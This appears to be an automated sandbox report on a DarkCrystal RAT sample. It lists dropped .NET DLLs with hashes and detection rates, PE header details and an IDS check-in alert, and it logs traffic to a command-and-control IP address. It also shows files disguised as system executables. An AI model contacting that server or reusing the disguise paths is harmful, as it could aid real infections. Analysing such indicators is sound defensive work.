                                                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):294912
                                                                                                    Entropy (8bit):6.010605469502259
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38912
                                                                                                    Entropy (8bit):5.679286635687991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):50176
                                                                                                    Entropy (8bit):5.723168999026349
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):342528
                                                                                                    Entropy (8bit):6.170134230759619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                    MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                    SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                    SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                    SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64000
                                                                                                    Entropy (8bit):5.857602289000348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85504
                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64000
                                                                                                    Entropy (8bit):5.857602289000348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36352
                                                                                                    Entropy (8bit):5.668291349855899
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                    MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                    SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                    SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                    SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85504
                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32256
                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24576
                                                                                                    Entropy (8bit):5.535426842040921
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                    MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                    SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                    SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                    SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55
                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                    Malicious:false
                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:MSVC .res
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1224
                                                                                                    Entropy (8bit):4.435108676655666
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                    Malicious:false
                                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4608
                                                                                                    Entropy (8bit):3.9802378117346158
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:6Lp/PtP+M7Jt8Bs3FJsdcV4MKe271dEUvqBHSOulajfqXSfbNtm:GP1Pc+Vx9McUvk8cjRzNt
                                                                                                    MD5:F8E9668B6967B0CFCD84B5D5BE937FE7
                                                                                                    SHA1:1DA2959E84C1EAAC7858329ABCF352B08C71318C
                                                                                                    SHA-256:3980F6B84D146EED21B82DF24FCD7923725DFBB0BBD562975FE0EEFC2505BB54
                                                                                                    SHA-512:6C427420341A26C699B8DD4582E0275DFFE289A9261785770D4D6E5808DD56A729E74966FD0ADDE9F67424FD88ADFFDFDB7A7447F3CE767213FB47E0986C0191
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with very long lines (617), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):617
                                                                                                    Entropy (8bit):5.8824875436939585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:SOIlyRoJ4vL7TEDOxhkdYRj1rfE9e3RrGCYy9JNqd2qD:SOWyqu+OxhjjJc5CfS2i
                                                                                                    MD5:05A2835419371B88F8452138679FF753
                                                                                                    SHA1:65A32017771EB327605D48FB03BDDF8B1F92072B
                                                                                                    SHA-256:987701A30C4B03A9622A3843127CF81FE164510F23EFB5B503FBC47F675A2C9B
                                                                                                    SHA-512:9176A0DD8EB7D24D05F73F6EDB4FC8471A77F57D97FDE52082D3A2C8C4DAEBD0C1C4FDB628CB340411F2D26E62E48BDF5A8210D3D823A71D9F1B5ABACF2C4954
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:false
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                    Process:C:\Windows\System32\PING.EXE
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):502
                                                                                                    Entropy (8bit):4.622527548334437
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:PlR5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:BdUOAokItULVDv
                                                                                                    MD5:DF052D7F9603AAE5B5376EB7CFCC8952
                                                                                                    SHA1:F4FAA7034A24B0864B8D2FB1AB0BDE4726F6CA74
                                                                                                    SHA-256:B1E29F7BD855951ABCBD1FBACF4B303E327966D42C9F24A11A85EDADE0E461EE
                                                                                                    SHA-512:20A216261BCCBD2E7FADC4D7A084266877DFCE9C66C4F4E02F882276D31C3081AB880AAE5A01E63B5B40EEDD363C37B30D911952521CC88A398239CDED8C424B
                                                                                                    Malicious:false
                                                                                                    Preview:..Pinging 549163 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File size:3'038'208 bytes
                                                                                                    MD5:f9589e19d9a2ffbfacb439b029ab4f06
                                                                                                    SHA1:0eb7246ee67d0a7289a1eb5d76a4df8f1c6a4a72
                                                                                                    SHA256:6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746bf082418d809b9763156
                                                                                                    SHA512:b2ebc7249f727a529a693480689f3080189915c702b4e0f369207989d38482b6b2013daa1a3010d488ca8e64dd56dc4156b67eda80195d8a0c438b794577d87a
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    TLSH:E3E5BF0EDAD34130CC652BB910CA0E6CE7B8D3776571EF427A5FA8A558CA2318E550FB
                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                    Entrypoint:0x6e737e
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e7330 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e8000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2ea000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2e5384 | 0x2e5400 | 9288185be747f2ef211df9c85dc5b7ce | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x2e8000 | 0x370 | 0x400 | eaba832ff201ffa4d3d6b4f3e7d1baf0 | False | 0.3759765625 | data | 2.859486648576093 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x2ea000 | 0xc | 0x200 | ae1accb1d1e35f1ed27975b31704c3b3 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x2e8058 | 0x318 | data | | | 0.44823232323232326
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-04T14:52:18.763665+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49731 | 154.29.71.9 | 80 | TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 4, 2025 14:52:23.148946047 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.279915094 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.280144930 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.634776115 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.635379076 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.639789104 CET8049739154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.639852047 CET4973980192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.640206099 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.640358925 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.640535116 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.645407915 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.990158081 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.995044947 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995058060 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995070934 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995080948 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995120049 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.995121956 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995176077 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.995218992 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995229006 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995270014 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995275974 CET4974080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:52:23.995280981 CET8049740154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:52:23.995341063 CET4974080192.168.2.4154.29.71.9
